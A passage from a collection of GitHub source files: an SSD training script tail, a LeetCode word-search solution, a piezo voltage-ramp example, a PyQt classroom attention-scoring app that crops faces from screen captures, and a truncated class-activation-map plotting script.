build_LRscheduler(setting_dict[\"solver\"][\"LRscheduler\"])(optimizer,\n                                                 setting_dict[\"solver\"][\"LR_STEP\"])\n    train_loader = make_dataLoader(setting_dict[\"train\"], True)\n    test_loader = make_dataLoader(setting_dict[\"test\"], False)\n    checkpointer = CheckPoint(model, optimizer, scheduler, \"\", logger)\n    print(setting_dict[\"train_epoch\"])\n    for i in range(1,setting_dict[\"train_epoch\"] +1):\n        do_train_one_epoch(model,train_loader,optimizer,scheduler,device,setting_dict[\"out_dir\"], i)\n        if i % 1 == 0 :\n            do_evaluate(model, test_loader, device,setting_dict[\"out_dir\"], i)\n        if i % 7 == 0 :\n            checkpointer.save(setting_dict[\"out_dir\"]+\"/v3_model_{:06d}\".format(i))\n    checkpointer.save(\"final\")\n    return model\n\n\ndef main():\n    torch.backends.cudnn.benchmark = True\n\n    parse = argparse.ArgumentParser(description=\"PYtorch-SSD train process\")\n\n    parse.add_argument(\"--out_dir\", type=str, default=\".\")\n    parse.add_argument(\"--fine_tune\", type=bool, default=False)\n    parse.add_argument(\"--pretrained_model\", type=str, default=\"\")\n\n    args = parse.parse_args()\n    utils.setting_dict.setting_dict[\"out_dir\"] = args.out_dir + utils.setting_dict.setting_dict[\"out_dir\"]\n    utils.setting_dict.setting_dict[\"fine_tune\"] = args.fine_tune\n    utils.setting_dict.setting_dict[\"pretrained_model\"] = args.pretrained_model\n\n    model = train(setting_dict=utils.setting_dict.setting_dict)\n    torch.cuda.empty_cache()\n\nif __name__ == 
\"__main__\" :\n main()\n\n","repo_name":"nwpu-v5-team/ICRA-RoboMaster-2020-Perception","sub_path":"SSD-Detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"35"} +{"seq_id":"69869923941","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n \n ind = 0\n for i in range(len(board)):\n for j in range(len(board[0])):\n visited = [[0 for _ in range(len(board[0]))] for _ in range(len(board))]\n ind = 0\n if board[i][j] == word[ind]:\n if self.dfs(i, j, word, visited, board, ind):\n return True\n \n return False\n \n\n# def dfs(self, board: List[List[str]], word: str, i: int, j: int, visited: List[List[bool]], k: int) -> bool:\n# if k == len(word):\n# return True\n# if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]) or board[i][j] != word[k] or visited[i][j]: \n# return False\n# visited[i][j] = True\n# res1 = self.dfs(board, word, i + 1, j, visited, k + 1)\n# res2 = self.dfs(board, word, i - 1, j, visited, k + 1)\n# res3 = self.dfs(board, word, i, j + 1, visited, k + 1)\n# res4 = self.dfs(board, word, i, j - 1, visited, k + 1)\n# visited[i][j] = False\n# return (res1 or res2 or res3 or res4)\n\n \n \n def dfs(self, i, j, word, visited, board, ind):\n \n if ind == len(word):\n return True\n \n \n if i < 0 or j < 0 or i > len(board) - 1 or j > len(board[0]) - 1 or board[i][j] != word[ind] or visited[i][j]:\n return False\n \n visited[i][j] = True\n \n res = (self.dfs(i+1, j, word, visited, board, ind+1) or self.dfs(i-1, j, word, visited, board, ind+1) or self.dfs(i, j-1, word, visited, board, ind+1) or self.dfs(i, j+1, word, visited, board, ind+1))\n \n visited[i][j] = False\n \n return res","repo_name":"Vamsi995/LeetCode-Python","sub_path":"79-word-search/79-word-search.py","file_name":"79-word-search.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70408778342","text":"#!/usr/bin/env python3\n\nimport thorpezo as t\nimport time\nimport numpy as np\n\ndef ramp(dev, volts, delay):\n dev.ignore_serial_read(True)\n dev.ser.timeout=0.0001\n for v in volts:\n dev.set_xvolt(v)\n time.sleep(delay)\n time.sleep(0.01)\n dev.ignore_serial_read(False)\n dev.ser.timeout=0.01\n\nvlist=np.linspace(0,100,10001)\n\ni=t.Thorpezo('/dev/ttyACM0')\n\np=i.device\n\np.msg('id?')\n\nramp(p, vlist,0.0001)\n","repo_name":"gabrielbenedikt/thorpezo","sub_path":"examples/ramp.py","file_name":"ramp.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24107578932","text":"# -*- coding: utf-8 -*-\r\nfrom PyQt5.QtCore import Qt, QCoreApplication, pyqtSlot, QTimer, pyqtSlot\r\nfrom PyQt5 import QtWidgets, uic\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom datetime import datetime\r\nimport sys, io, cv2\r\nimport random, pathlib, os\r\nfrom fastai.vision.all import *\r\nfrom fastai.vision.widgets import *\r\n\r\nfrom google.cloud import vision\r\nfrom google.cloud.vision_v1 import types\r\nfrom PIL import ImageGrab\r\nimport pathlib, os\r\n\r\ntemp = pathlib.PosixPath\r\n# pathlib.PosixPath = pathlib.WindowsPath\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = 
\"./files/zoomCapture-b179ff82aa06.json\"\r\n\r\n\r\ndef getInfo(dir_list, dataPath):\r\n learn_inf = load_learner(path / 'export.pkl', cpu=True)\r\n for item in dir_list:\r\n img = PILImage.create(dataPath + '/' + item)\r\n pred, pred_idx, probs = learn_inf.predict(img)\r\n name = item.split('.')[0]\r\n students_input[name] = pred\r\n print(pred)\r\n\r\n # 현재 데이터셋 폴더에 들어있는, 예측이 완료된 이미지 데이터들을 삭제\r\n # for item in dir_list:\r\n # os.remove(dataPath + '/' + item)\r\n\r\n\r\nclass MyApp1(QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n self.className = None\r\n\r\n def initUI(self):\r\n # 시작 버튼\r\n btn1 = QPushButton('Start', self)\r\n # 버튼에 기능을 연결하는 코드\r\n btn1.clicked.connect(self.button1Function)\r\n\r\n # 사진\r\n pixmap = QPixmap('logo.png')\r\n lbl_img = QLabel()\r\n lbl_img.setPixmap(pixmap)\r\n lbl_img.setAlignment(Qt.AlignCenter)\r\n\r\n # 텍스트창에 대한 라벨\r\n classLabel = QLabel('Class Name : ', self)\r\n font1 = classLabel.font()\r\n font1.setPointSize(20)\r\n\r\n # 텍스트창\r\n qle = QLineEdit(self)\r\n qle.textChanged[str].connect(self.onChanged)\r\n\r\n # 라벨과 텍스트창 레이아웃\r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(classLabel)\r\n hbox.addWidget(qle)\r\n\r\n # 레이아웃\r\n vbox = QVBoxLayout()\r\n vbox.addWidget(btn1)\r\n vbox.addWidget(lbl_img)\r\n vbox.addLayout(hbox)\r\n self.setLayout(vbox)\r\n\r\n # 제목 및 시작위치, 사이즈\r\n\r\n self.setWindowTitle('Group D Project')\r\n self.setGeometry(300, 300, 300, 200)\r\n\r\n # btn1이 눌리면 작동할 함수\r\n def button1Function(self):\r\n print(\"Start button Clicked\")\r\n self.hide()\r\n createFolder('./' + self.className + '/students')\r\n createFolder('./' + self.className + '/temp')\r\n processed_inputs = inputs_process(inputs)\r\n dlg = MyApp2(processed_inputs)\r\n dlg.exec_()\r\n\r\n # test입력창\r\n def onChanged(self, text):\r\n self.className = text\r\n\r\n\r\ndef inputs_process(inputs):\r\n average_score = inputs[0]\r\n scores = inputs[1]\r\n students_score = list()\r\n for name, score in scores.items():\r\n students_score.append((name, score))\r\n random.shuffle(students_score)\r\n students_score = students_score[:5]\r\n processed_inputs = (average_score, students_score)\r\n return processed_inputs\r\n\r\n\r\nclass MyApp2(QDialog):\r\n\r\n def __init__(self, processed_inputs):\r\n super().__init__()\r\n print(\"myapp2 init 들어옴\")\r\n self.show()\r\n self.inputs = processed_inputs\r\n self.i = 0\r\n self.initUI()\r\n self.dataPath = None\r\n self.dir_list = None\r\n self.time_class = list(range(len(class_stat)))\r\n\r\n def initUI(self):\r\n # 라벨 평균\r\n\r\n print(self.inputs)\r\n self.text0 = str(self.inputs[0])\r\n self.label0 = QLabel(self.text0, self)\r\n self.label0.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label0.font()\r\n font.setPointSize(50)\r\n self.label0.setFont(font)\r\n\r\n # 라벨 1\r\n self.text1 = str(self.inputs[1][0][0]) + ' ' + str(self.inputs[1][0][1])\r\n self.label1 = QLabel(self.text1, self)\r\n self.label1.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label1.font()\r\n font.setPointSize(20)\r\n self.label1.setFont(font)\r\n\r\n # 라벨 2\r\n self.text2 = str(self.inputs[1][1][0]) + ' ' + str(self.inputs[1][1][1])\r\n self.label2 = QLabel(self.text2, self)\r\n self.label2.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label2.font()\r\n font.setPointSize(20)\r\n self.label2.setFont(font)\r\n self.label2.setAlignment(Qt.AlignVCenter)\r\n\r\n # 라벨 3\r\n self.text3 = str(self.inputs[1][2][0]) + ' ' + str(self.inputs[1][2][1])\r\n self.label3 = QLabel(self.text3, 
self)\r\n self.label3.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label3.font()\r\n font.setPointSize(20)\r\n self.label3.setFont(font)\r\n\r\n # 라벨 4\r\n self.text4 = str(self.inputs[1][3][0]) + ' ' + str(self.inputs[1][3][1])\r\n self.label4 = QLabel(self.text4, self)\r\n self.label4.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label4.font()\r\n font.setPointSize(20)\r\n self.label4.setFont(font)\r\n\r\n # 라벨 5\r\n self.text5 = str(self.inputs[1][4][0]) + ' ' + str(self.inputs[1][4][1])\r\n self.label5 = QLabel(self.text5, self)\r\n self.label5.setAlignment(Qt.AlignCenter) # 위치(중앙)\r\n font = self.label5.font()\r\n font.setPointSize(20)\r\n self.label5.setFont(font)\r\n\r\n # 종료 버튼\r\n quit_btn = QPushButton('Quit') # 버튼 생성(텍스트, 버튼이 위치할 부모 위젯)\r\n quit_btn.resize(quit_btn.sizeHint()) # 버튼 사이즈\r\n quit_btn.clicked.connect(self.quit_Function) # click시 함수 호출\r\n\r\n # 라벨 수직 배치\r\n self.layout = QVBoxLayout()\r\n self.layout.addWidget(self.label0)\r\n self.layout.addWidget(self.label1)\r\n self.layout.addWidget(self.label2)\r\n self.layout.addWidget(self.label3)\r\n self.layout.addWidget(self.label4)\r\n self.layout.addWidget(self.label5)\r\n self.layout.addWidget(quit_btn)\r\n self.setLayout(self.layout)\r\n\r\n # Timer 설정\r\n self.timer = QTimer(self)\r\n self.timer.start(2000) # 10.000초마다 반복(1000=1초)\r\n self.timer.timeout.connect(self.timeout_run) # 화면 갱신 함수\r\n\r\n # 스크린 기본 설정\r\n self.setWindowTitle('My First Application') # 제목\r\n self.setGeometry(1700, -10, 100, 2000) # 스크린 위치와 크기\r\n self.show() # 스크린 출력\r\n\r\n # 화면 갱신\r\n @pyqtSlot()\r\n def timeout_run(self):\r\n print(\"timeout 들어옴\")\r\n # 캡쳐하는 부분\r\n capture(ex.className)\r\n\r\n # 캡쳐된 사진을 모델에 돌리고 다시 삭제하는 부분\r\n dataPath = './' + ex.className + '/students' # dataset folder\r\n dir_list = os.listdir(dataPath)\r\n getInfo(dir_list, dataPath)\r\n\r\n # students_input은 {학생:예측결과} [capture의 반환결과]를 의미합니다. 
ex) {'kim':'a','nick', 'm', 'han':'d'}\r\n # student_score_update 는 students_input 결과를 보고 학생 점수표를 갱신시킵니다.\r\n student_score_update(students_input)\r\n\r\n # current_output()은 학생 점수표를 보고 (평균점수, {학생:점수})를 반환합니다.\r\n # inputs_process는 (평균점수, {학생:점수})를 입력받고, (평균점수, [학생, 점수] (5명 랜덤)) 형태로 변환합니다.\r\n # inputs를 갱신시킵니다\r\n self.inputs = inputs_process(current_output())\r\n\r\n self.text0 = str(self.inputs[0])\r\n self.label0.setText(self.text0)\r\n self.text1 = str(self.inputs[1][0][0]) + ' ' + str(self.inputs[1][0][1])\r\n self.label1.setText(self.text1)\r\n self.text2 = str(self.inputs[1][1][0]) + ' ' + str(self.inputs[1][1][1])\r\n self.label2.setText(self.text2)\r\n self.text3 = str(self.inputs[1][2][0]) + ' ' + str(self.inputs[1][2][1])\r\n self.label3.setText(self.text3)\r\n self.text4 = str(self.inputs[1][3][0]) + ' ' + str(self.inputs[1][3][1])\r\n self.label4.setText(self.text4)\r\n self.text5 = str(self.inputs[1][4][0]) + ' ' + str(self.inputs[1][4][1])\r\n self.label5.setText(self.text5)\r\n\r\n # 종료 버튼이 눌리면 작동할 함수\r\n def quit_Function(self):\r\n self.hide()\r\n self.timer.stop()\r\n print(\"Quit button Clicked\")\r\n dlg = stat_app()\r\n class_title = ex.className\r\n dlg.exec_()\r\n\r\n def change_inputs(self, changed_inputs):\r\n self.inputs = changed_inputs\r\n\r\n\r\nclass student:\r\n def __init__(self, name=\"\"):\r\n self.name = name # 이름\r\n self.score = 60 # 현재 점수\r\n self.reaction = 0 # 리액션 횟수\r\n self.score_list = list() # 점수 기록\r\n\r\n # 1분당 1점씩 점수 감소\r\n def auto_minus(self):\r\n self.score -= 1\r\n\r\n # 리액션할 경우 점수 증가\r\n def React(self):\r\n self.score += 5\r\n if self.score > 100:\r\n self.score = 100\r\n self.reaction += 1 # 리액션 횟수 증가\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n # 아무것도 안할 경우 점수만 기록\r\n def Nope(self):\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n # 프레임에 없을 경우 점수 감소\r\n def OutofFrame(self):\r\n self.score -= 5\r\n if self.score < 0:\r\n self.score = 0\r\n self.score_list.append(self.score) # 점수 변화기록\r\n\r\n\r\n# Main function: 입력값을 학생 객체에 갱신시킨다.\r\ndef student_score_update(students_input):\r\n for name, result in students_input.items():\r\n student_in = False # 매칭되는 학생 존재 여부\r\n # 만약 매칭되는 학생 개체가 있으면 갱신한다.\r\n for st in st_Obj_list:\r\n if name == st.name:\r\n student_in = True\r\n if result == 'clap' or result == 'nod' or result == 'smile':\r\n st.React()\r\n elif result == 'default':\r\n st.Nope()\r\n elif result == 'yawn' or result == 'outOfFrame':\r\n st.OutofFrame()\r\n\r\n # 매칭되는 학생 개체가 없으면 생성한다.\r\n if student_in == False:\r\n st_Obj = student(name)\r\n st_Obj_list.append(st_Obj)\r\n if result == 'smile' or result == 'nod' or result == 'clap':\r\n st_Obj.React()\r\n elif result == 'default':\r\n st_Obj.Nope()\r\n elif result == 'outOfFrame' or result == 'yawn':\r\n st_Obj.OutofFrame()\r\n\r\n\r\ndef current_output():\r\n total_score = 0\r\n # 현재 수업 평균 점수 계산 및 기록 및 출력\r\n average_score = 60\r\n for st in st_Obj_list:\r\n total_score += st.score\r\n average_score = total_score / len(st_Obj_list)\r\n # 수업 평균 점수를 기록한다\r\n average_score_list.append(average_score)\r\n\r\n # student_output: {학생: 현재 점수, 학생: 현재 점수, 학생: 현재 점수}\r\n student_output = dict()\r\n for st in st_Obj_list:\r\n student_output[st.name] = st.score\r\n # 최종 out: (수업평균점수, student_output)\r\n return (average_score, student_output)\r\n\r\n\r\ndef final_output():\r\n # final_student_output: {학생: 평균 점수, 학생: 평균 점수, 학생: 평균점수}\r\n final_student_output = dict()\r\n for st in st_Obj_list:\r\n final_student_score = sum(st.score_list) / len(st.score_list)\r\n 
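        # (hedged worked example, not in the original) a score_list of [60, 65, 60]\r\n        # averages to 61.67, reported below together with the reaction count.\r\n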
        final_student_output[st.name] = (final_student_score, st.reaction)\r\n    # overall class average score\r\n    final_class_score = sum(average_score_list) / len(average_score_list)\r\n    # final out: (final_student_output, final class average, list of class average scores)\r\n    return (final_student_output, final_class_score, average_score_list)\r\n\r\n\r\nclass stat_app(QDialog):\r\n\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.setVisible(True)\r\n        self.student_stat = None\r\n        self.class_stat = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n        self.time_class = None\r\n        self.initUI()\r\n\r\n    def initUI(self):\r\n        print(\"entered stat_app initUI\")\r\n        grid = QGridLayout()\r\n        self.setLayout(grid)\r\n\r\n        x, y, z = final_output()\r\n        self.get_info(x, y, z)\r\n\r\n        # Graph drawing\r\n        self.fig = plt.Figure()\r\n        ax = self.fig.add_subplot(111)\r\n        ax.set_title(ex.className + \"\\n\" + now + \"\\n\" + \"Class Attention Gauge\")\r\n        ax.set_xlabel('Time(divided by 10)')\r\n        ax.set_ylabel('Gauge')\r\n        self.time_class = list(range(len(self.class_stat)))\r\n        ax.plot(self.time_class, self.class_stat, label='Class Attention Gauge')\r\n        self.canvas = FigureCanvas(self.fig)\r\n\r\n        # Student stat printing\r\n        self.stat_tb = QTableWidget(self)\r\n        self.stat_tb.setRowCount(len(self.student_stat))\r\n        self.stat_tb.setColumnCount(3)\r\n        self.set_stat_table()\r\n\r\n        # Layout\r\n        leftLayout = QVBoxLayout()\r\n        leftLayout.addWidget(self.canvas)\r\n        grid.addWidget(QLabel('Final Stat'), 0, 0)\r\n        grid.addLayout(leftLayout, 1, 0)\r\n        grid.addWidget(QLabel('Student Stat'), 0, 1)\r\n        grid.addWidget(self.stat_tb, 1, 1)\r\n\r\n        # Add export button\r\n        btn = QPushButton('Export', self)\r\n        grid.addWidget(btn, 2, 1)\r\n        btn.resize(btn.sizeHint())\r\n        btn.clicked.connect(self.export_clicked)\r\n\r\n        self.setWindowTitle('Final Result Data')\r\n        self.setWindowIcon(QIcon(\"Pictures/LAM로고.png\"))\r\n        self.setGeometry(500, 400, 1015, 700)\r\n        self.show()\r\n\r\n    # setting up student table\r\n\r\n    def set_stat_table(self):\r\n        column_headers = ['name', 'score', 'reaction']\r\n        row = 0\r\n        print(\"set_stat_table info\")\r\n        print(self.student_stat)\r\n        self.stat_tb.setHorizontalHeaderLabels(column_headers)\r\n        for key, value in self.student_stat.items():\r\n            self.stat_tb.setItem(row, 0, QTableWidgetItem(key))\r\n            self.stat_tb.setItem(row, 1, QTableWidgetItem(str(value[0])))\r\n            self.stat_tb.setItem(row, 2, QTableWidgetItem(str(value[1])))\r\n            row += 1\r\n\r\n    # if export button is clicked,\r\n    # student stat .csv // class graph .jpg\r\n    # are exported\r\n\r\n    def get_info(self, st_stat, class_score, c_stat):\r\n        print(\"get_info info\")\r\n        print(st_stat)\r\n        print(class_score)\r\n        print(c_stat)\r\n        self.student_stat = st_stat\r\n        self.class_stat = c_stat\r\n        print(\"self info\")\r\n        print(self.student_stat)\r\n        print(self.class_stat)\r\n\r\n    def export_clicked(self):\r\n        print(\"Export button info\")\r\n        print(self.class_stat)\r\n        print(self.student_stat)\r\n        f = open(ex.className + '_csv' + now + '_result.csv', 'w', encoding=\"UTF-8\")\r\n        f.write('time' + ',' + 'avg' + '\\n')\r\n        row = 0\r\n        for value, row in zip(self.class_stat, range(len(self.class_stat))):\r\n            f.write(str(row) + ',' + str(value) + '\\n')\r\n        f.write('\\n')\r\n\r\n        f.write('name' + ',' + 'score' + ',' + 'reaction' + '\\n')\r\n        for key, value in self.student_stat.items():\r\n            f.write(key + ',' + str(value[0]) + ',' + str(value[1]) + '\\n')\r\n        f.close()\r\n        self.fig.savefig(ex.className + '_jpg' + now + '_graph.jpg')\r\n\r\n\r\nclass person(object):\r\n    def __init__(self, name):\r\n        self.name = name\r\n\r\n    def __str__(self):\r\n        return self.name\r\n\r\n    def __repr__(self):\r\n        return \"'\" + self.name + \"'\"\r\n\r\n\r\ndef capture(classDir):\r\n    img_full = ImageGrab.grab()\r\n    width, height = img_full.size\r\n    tempDir = classDir + '/temp/temp.png'\r\n    img_full.crop((width / 18, height / 7, width * (14 / 18), height * (6 / 7))).save(tempDir, \"PNG\")\r\n    faceCrop(tempDir, classDir)\r\n\r\n\r\ndef faceCrop(tempDir, classDir):\r\n    # print(\"tempDir :\"+tempDir)\r\n    # print(\"classDir :\"+classDir)\r\n\r\n    tempImg = cv2.imread(tempDir)\r\n    height, width, channel = tempImg.shape\r\n\r\n    with io.open(tempDir, 'rb') as image_file:\r\n        content = image_file.read()\r\n    image = types.Image(content=content)\r\n    client = vision.ImageAnnotatorClient()\r\n    response = client.text_detection(image=image)\r\n    texts = response.text_annotations\r\n\r\n    print(len(texts))\r\n    if len(texts) > 2 and len(texts) < 50:\r\n        firstVertices = texts[1].bounding_poly.vertices\r\n        f_cornerX = firstVertices[3].x\r\n        secondVertices = texts[2].bounding_poly.vertices\r\n        s_cornerX = secondVertices[3].x\r\n\r\n        dx = s_cornerX - (f_cornerX + firstVertices[2].x)\r\n        dy = int(dx * 0.6)\r\n\r\n        if not os.path.isdir(classDir + \"/students\"):\r\n            os.mkdir(classDir + \"/students\")\r\n            print(classDir + \"/students\" + \" folder created\")\r\n        print(\"if branch not taken\")\r\n        # print(texts[1:])\r\n        # COUNT = 0\r\n        for text in texts[1:]:\r\n            print(\"entered the faceCrop for loop\")\r\n            # cv2.rectangle(img=tempImg, pt1=(text.bounding_poly.vertices[0].x,text.bounding_poly.vertices[0].y), pt2=(text.bounding_poly.vertices[2].x,text.bounding_poly.vertices[2].y),color=(255,0,0))\r\n            print(text.description)\r\n            print(\"In\")\r\n            path = classDir + \"/students/\"\r\n            vertex = text.bounding_poly.vertices[3]\r\n            leftTopY = vertex.y - dy - 5\r\n            rightBotX = vertex.x + dx + 5\r\n            if leftTopY < 0:\r\n                leftTopY = 0\r\n            if rightBotX > width:\r\n                rightBotX = width\r\n            face = tempImg[leftTopY: vertex.y, vertex.x: rightBotX]\r\n            if rightBotX - vertex.x > width / 7 and vertex.y - leftTopY > height / 7:\r\n                print(text.description)\r\n                # print(leftTopY, vertex.y, vertex.x, rightBotX)\r\n                cv2.imwrite(path + text.description + '.png', face)\r\n                print(text.description + \" writing..\")\r\n                # cv2.putText(tempImg, str(COUNT), (leftTopY, vertex.x), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 0, 0))\r\n                # cv2.rectangle(img=tempImg, pt1=(vertex.x, (leftTopY)), pt2=((rightBotX), vertex.y), color=(0, 255, 0))\r\n                # COUNT += 1\r\n            else:\r\n                print(\"HI!\")\r\n\r\n        # cv2.imshow(\"img\", tempImg)\r\n        # cv2.waitKey(0)\r\n        # cv2.destroyAllWindows()\r\n    else:\r\n        print(\"Error: too many\")\r\n\r\n\r\ndef createFolder(directory):\r\n    try:\r\n        if not os.path.exists(directory):\r\n            os.makedirs(directory)\r\n    except OSError:\r\n        print('Error: Creating directory. ' + directory)\r\n\r\n\r\nclassName = ''\r\ninputs = (\r\n50, {person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0, person(\" \"): 0})\r\nstatus = False\r\nstudent_stat = {' ': (0, 0), ' ': (0, 0), ' ': (0, 0), ' ': (0, 0)}\r\nclass_stat = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\nnow = datetime.now().strftime('%Y-%m-%d_%H%M')\r\n\r\napp = QApplication(sys.argv)\r\npath = Path()\r\nstudents_input = dict()\r\nst_Obj_list = list() # collection of student objects\r\naverage_score_list = list() # average score history\r\nex = MyApp1()\r\nex.show()\r\nsys.exit(app.exec_())\r\n","repo_name":"CAUdLearning/LAM","sub_path":"LAM2.py","file_name":"LAM2.py","file_ext":"py","file_size_in_byte":19587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"9333133223","text":"# simple implementation of CAM in PyTorch for the networks such as ResNet, DenseNet, SqueezeNet, Inception\n\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.nn import functional as F\nfrom torch.nn import Upsample\nfrom model.net import get_network\nfrom model.config import config\nfrom UCR_DataLoader.UCR_Archive_Dataset import UCR_DataSet\nfrom UCR_DataLoader.UCR_Archive_Dataset import get_data\nfrom utils import argparser\nfrom torch.utils.data import DataLoader\nimport os\nfrom matplotlib import pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport UCR_DataLoader.time_series_augmentation.utils.augmentation as aug\n\n# hook the feature extractor\nfeatures_blobs = []\n\n\ndef plot_data_aug(x):\n    aug_list = ['Jittering', 'Magnitude_Warping', 'Window_Wraping', 'Scaling']\n    plt.rcParams[\"figure.figsize\"] = 5, 2.75\n    x_trn = x.transpose(1, 2).cpu().numpy()\n    x_train_max = np.max(x_trn)\n    x_train_min = np.min(x_trn)\n
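    # (hedged note, not in the original) min-max rescale to [-1, 1]: with min 0 and\n    # max 10, a raw value of 7.5 maps to 2 * 0.75 - 1 = 0.5.\n    x_train = 2. 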
* (x_trn - x_train_min) / (x_train_max - x_train_min) - 1.\n for aug_type in aug_list:\n if aug_type == 'Jittering':\n x_aug = aug.jitter(x_train, sigma=0.02)\n elif aug_type == 'Scaling':\n x_aug = aug.scaling(x_train, sigma=0.1)\n elif aug_type == 'Magnitude_Warping':\n x_aug = aug.magnitude_warp(x_train, sigma=0.1, knot=4)\n else:\n x_aug = aug.window_warp(x_train, window_ratio=0.1, scales=[0.5, 2.])\n x_tmp = x_train.squeeze(0).squeeze(1)\n x_aug_tmp = np.transpose(x_aug, (0, 2, 1)).squeeze(\n 0).squeeze(0)\n t = range(len(x_tmp))\n\n plt.plot(t, x_tmp, 'b-', label='$X$')\n plt.plot(t, x_aug_tmp, 'r-', label='$\\^{X}$')\n plt.xlabel('Sequence')\n plt.ylabel('Normalized Value')\n plt.legend()\n plt.tight_layout()\n plt.savefig(os.path.join(args.extra_tag,\n 'AUG_{}.pdf'.format(aug_type)))\n plt.clf()\n print('-> Plotting augmented X is done.')\n\n\ndef upsampler(input):\n upsampler = Upsample(scale_factor=2, mode='linear', align_corners=True)\n inp_tensor = torch.from_numpy(input).unsqueeze(0)\n output = upsampler(inp_tensor)\n output = output.squeeze(0).squeeze(0).data.cpu().numpy()\n return output\n\n\ndef plot(x, CAM, model):\n plt.rcParams[\"figure.figsize\"] = 5, 2.75\n\n fig = plt.figure(constrained_layout=True)\n spec2 = gridspec.GridSpec(ncols=1, nrows=7, figure=fig)\n\n ax1 = fig.add_subplot(spec2[0:6, 0])\n ax2 = fig.add_subplot(spec2[6:7, 0])\n\n x_tmp = x.squeeze(0).squeeze(0).squeeze(0)\n x_tmp = x_tmp - torch.min(x_tmp)\n x_tmp = x_tmp / torch.max(x_tmp)\n seq = range(len(x_tmp))\n extent = [seq[0]-(seq[1]-seq[0])/2., seq[-1]+(seq[1]-seq[0])/2., 0, 1]\n\n ax1.plot(seq, x_tmp)\n # ax1.set_title('{}'.format(model))\n ax1.set_yticks([])\n ax1.set_xlim(extent[0], extent[1])\n ax1.set_xlabel('Sequence')\n\n ax2.imshow(CAM[0][np.newaxis, :], cmap=\"jet\",\n aspect=\"auto\", extent=extent)\n ax2.set_yticks([])\n ax2.set_xlim(extent[0], extent[1])\n\n plt.tight_layout()\n plt.savefig(os.path.join(args.extra_tag, 'CAM_{}.pdf'.format(model)))\n plt.clf()\n\n\ndef hook_feature(module, input, output):\n features_blobs.append(input[0].data.cpu().numpy())\n\n\ndef returnCAM(feature_conv, weight_softmax, class_idx, size_upsample):\n # generate the class activation maps upsample to 256x256\n #size_upsample = (256, 256)\n bz, nc, h, w = feature_conv.shape\n output_cam = []\n for idx in class_idx:\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = upsampler(cam)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n # cam_img = 2*(cam_img)-1\n #cam_img = np.uint8(255 * cam_img)\n output_cam.append(cam_img)\n return output_cam\n\n\ndef extend_4d(x, y):\n\n x = x.reshape(x.shape[1], x.shape[0])\n # This function is for making a 1D input time series to 4D.\n x = torch.unsqueeze(x, 0)\n return x, y\n\n\ndef main(args):\n\n global features_blobs\n\n finalconv_name = 'downsampler'\n\n transf = extend_4d if args.conv2d else None\n\n _, _, x_test, y_test, nb_class = get_data(args=args)\n\n val_dataset = UCR_DataSet(\n x=x_test, y=y_test, nb_class=nb_class, args=None, train=False, transform=transf)\n\n batch_size = val_dataset.x.shape[0]\n\n val_loader = DataLoader(\n val_dataset, batch_size=batch_size, shuffle=False, pin_memory=True)\n\n input_size = val_dataset.length\n predict_size = val_dataset.num_class\n\n # create model\n\n print(\"=> creating {} model.\".format(args.model_configuration))\n # Load model for training and inference\n net = get_network(args.model_configuration, input_size,\n prediction_size=predict_size, dropout=args.dropout, 
use_conv2d=args.conv2d)\n\n best_model = os.path.join(args.checkpoint, \"model_best.pth.tar\")\n source_state = torch.load(best_model)\n net.load_state_dict(source_state['state_dict'])\n\n net.cpu().eval()\n\n X, Y = next(iter(val_loader))\n\n plot_data_aug(X[0])\n\n net._modules.get(finalconv_name).register_forward_hook(hook_feature)\n\n # get the softmax weight\n params = list(net.parameters())\n\n for i in range(-3, -1):\n if i == -3:\n weight_softmax = torch.matmul(\n torch.transpose(params[i], 0, 1), torch.transpose(params[i+1], 0, 1)) # np.squeeze(.numpy())\n else:\n weight_softmax = torch.matmul(\n weight_softmax, torch.transpose(params[i+1], 0, 1)) # np.squeeze(.numpy())\n\n weight_softmax = torch.transpose(weight_softmax, 0, 1).data.cpu().numpy()\n\n for j in range(predict_size):\n true_positive = False\n temp_i = 0\n features_blobs = []\n while not true_positive:\n idx_class = np.argwhere(Y == j)\n if temp_i >= len(idx_class[0]):\n print('X> Class {} cannot be recognized at all.'.format(j))\n break\n x = torch.unsqueeze(X[idx_class[0][temp_i]], 0)\n logit = net(x)\n\n if predict_size > 2:\n h_x = F.softmax(logit, dim=1).data.squeeze()\n probs, idx = h_x.sort(0, True)\n probs = probs.numpy()\n idx = idx.numpy()\n\n true_positive = (idx[0] == j)\n tmp_id = idx[0]\n else:\n if j == 0:\n 